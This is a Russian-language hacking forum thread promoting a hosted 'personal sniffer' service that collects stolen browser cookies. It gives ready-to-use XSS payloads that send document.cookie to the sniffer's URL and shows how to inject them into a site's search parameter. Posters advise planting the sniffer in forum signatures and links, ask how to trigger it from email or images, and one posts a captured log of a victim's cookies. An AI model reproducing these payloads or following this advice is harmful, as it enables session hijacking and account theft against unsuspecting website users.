|
Сниффер от netsec.ru
На античате не работает, да и вообще в рунете не видел персональных - решил восстановить старый. На этот раз все будет тип-топ, т.к уже на своем серваке все :)
Как узнать адрес моего персонального сниффера? Адрес вашего снифера – http://s.netsec.ru/Ваш_Логин.gif (Обратие внимание на регистр!) Как им воспользоваться? Простой вызов по ссылке: Код HTML:
<a href="http://s.netsec.ru/mda.gif?test">click me</a>Код HTML:
<img src="http://s.netsec.ru/mda.gif">Код HTML:
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script>На сниффере есть ограничение – 5000 записей. Поэтому регулярно следите за забитостью аккуанта, иначе вы можете не получить новых записей. Как применить? Читайте карту раздела статьи Дал ссылку, поставил аватару, поставил как фон , а поле стринг пустое Адрес – http://s.netsec.ru Регистрация нового – http://s.netsec.ru/?act=reg |
Добавлен фильтр по ИП и хосту.
|
После того как положили кое что на спамхаус, который грозился внести ИП сервера в блеки, но все равно внес хтя мы выполнили все их условия =) прикрутил домен назад, сниффер опять работает..
|
Чёт я неврубился как им пользоваться!? Как его запустить? и что надо вписать в Host или Ip?
|
Цитата:
|
Цитата:
|
TrON,
на античате он не работает уже чёрт знает сколько, там только log.php работает если я не прав, то ткни меня носом =) GreenBear, благодарю за скиффку, теперь сухо и тепло =) |
Цитата:
Сам снифак находится на http://OLD.antichat.ru/cgi-bin/s.jpg а лог на http://old.antichat.ru/sniff/log.php ------------ в странице лог просто указан не тот адрес да и все. Спокойно юзаю этот сниффер. |
Цитата:
А тот, что ты мне показал, можно конечно поюзать его, но я не хочу, ибо личный удобнее. Понятно о чём речь идёт? Сначала сам мозгами пошевели ;) |
https://forum.antichat.ru/showpost.php?p=347528&postcount=8 !
Цитата:
|
Время прилета кук отстает на 2 часа от системных часов.
|
просто время эстонское ...
|
слушай,а куки где?у меня только вот что пришло
------------------ Time: 24.06 -10.58.39 IP: 83.234.212.36 Host: Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.8 (build 01709)) String: --------------- что это мне может дать?что вообще может дать ай-пи? |
Цитата:
У мну все форцает. |
Как проверить работает ли снифер если мои куки в найденной xss не улетают, или пустое окно или слова document.cookie ? Использую http://s.netsec.ru
|
Пацаны, ко мне куки вабще не приходят. Только IP, хост, и информация да и пустое поле String. Написал все как надо и добавил +document.cookie, только чего то их нет. :(
|
ну у других работает же.
так что... |
У меня не пашет :(
|
Все пашет, надо в правильно виде ссылку давать. Например в ГТЧате может не пахать, т.к. там стоит редирект, соттвественно ты вылазишь неизвестно куда, а потом от этого неизвестно куда уже на сниф, соотв-но и не приходит ничего. Так по крайней мере у нас в чате.
Зато на форуме, внедренный в подпись куки шлет только так )))) |
Подскажите плиз, почему на эту ссылку, на снифак приходят тока мои куки(xss в теме сообщения)
<script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> Р.S. мои сообщения читают там где я их шлю)) |
у меня вопрос...может он и немного глупый... можно тырить куки с предыдущей по хистори странице?
|
нет, это нарушает политику безопасности браузера
|
и всё же мог бы кто-нибудь привести пример действительно работающего запроса который выдирает куки? =)
|
в первом посте есть.
|
А если юзать <frame>, куки с него не будут приходить?
|
а можно как нить сделать, чтобы: отослать код со сниффером на мыло, и этот код сам срабатывал (когда открывают сообщение)?
если так можно сделать, скажите как плиз :) |
Цитата:
Будет ли он работать снова ? |
кто-то дефейснул чтоли сайт??? там про Green Bear'a написано что-то....
|
сниффер работает.. и будет работать.
сайт уже наверно год не работает.. |
народ, скажите плиз, желательно подробнее и с объяснениями - как добавить скрипт в картинку, чтобы потом при загрузке картинки, скрипт автоматически срабатывал и отсылал куки снифферу.
заранее огрромное спасибо, и про плюсик не забуду :) |
Ты ПХП знаешь? Если да, то придумай сам. Если нет - пиши в личку или асю.
|
укажи ссылку к сниферу.
Типо так: ссылка (ведет к снифферу) Чел нажимает и куки твои)) |
все норм снифф работает.
А прелесть в том что лог запаролен и у каждого свой)) |
http://s.netsec.ru/max_26_rus.gif
|
Цитата:
|
этому видео 100 лет завтра.. не работает бага уже давно.
|
Народ помогите пожалуйста как правильно написать запрос со сниффером netsec.ru чтоб срабатывал при наведении мыши или как нибудь еще, если не фильтруется тег [googlevideo]
|
Цитата:
Например ты нашел XSS в www.site.com/search=И здесь сниффер. То есть: www.site.com/search=<script>img = new Image(); img.src = "http://s.netsec.ru/LOGIN?"+document.cookie;</script> У мну все работает. Расшифровывать в опере или в мозиле при помощи cookie editor |
Прости те меня за тупой вопрос!Мне вот на снифер s.netsec.ru пришла вот такая вот хрень объясните по подробней что это
Time: 15.11 -09.28.27 IP: *********** Host: http://cc.msnscache.com/cache.aspx?q=72332686331307&mkt=uk-UA&lang=uk-UA&w=30882ad3&FORM=CVRE2 Browser: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322) String: Код:
__utma=211301639.258014850.1182155382.1194284788.1194771843.23; __utmz=211301639.1194771843.23.25.utmccn=(organic)|utmcsr=msn|utmctr=Анімації|utmcmd=organic; style=null; ban=3; scook=1193180954; re_ret=0; rating_km_ua=2037; USERID=50533448; crVct=5; s_lastvisit=1193853435156; LyRatings=| |
Скажите пожалуиста...а как наити xss в воруме каком-нибудь?
|
| Время: 07:26 |